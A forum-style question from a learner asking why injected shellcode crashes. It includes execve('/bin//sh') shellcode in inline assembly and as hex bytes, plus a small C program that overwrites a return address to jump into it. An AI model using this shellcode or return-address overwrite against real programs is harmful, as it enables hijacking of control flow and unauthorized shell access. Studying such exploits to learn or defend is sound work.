I have been trying to understand how stack overflow attacks work. So far I can successfully redirect the return address to an instruction inside the original code. I have written a shellcode launcher in assembly and got it work inside a c program. With debugging using gdb, I obtained the hex representing the shellcode launcher and the c program works fine. Yet when I try to inject this hex string in another program I get the segmentation error.When I trace the return address I realized that it was successfully set to point the hex string before the program exits. snapshots show the steps. I am not able to figure out why the injection does not work given the fact that same code can create the shell in assembly and the return address of the main function was set to point the sc ( the string that creates new shell).
#include <stdio.h>
void main(){
asm(
"xorl %eax,%eax;"
"pushl %eax;"
"pushl $0x68732f2f;"
"pushl $0x6e69622f;"
"movl %esp,%ebx;"
"pushl %eax;"
"pushl %ebx;"
"movl %esp,%ecx;"
"movl %eax,%edx;"
"movb $0x0b,%al;"
"int $0x80;"
);
}
when I compile and run the above c code that includes assembly, it runs perfectly fine. I obtained the hex of the asm code in the c program above using gdb and generated following stack smash code.
char sc[]=
"\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1"
"\x89\xc2\xb0\x0b\xcd\x80";
void main(){
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)sc;
}
when I run the code I get the following error. Program received signal SIGSEGV, Segmentation fault. 0x0804a01c in sc ()
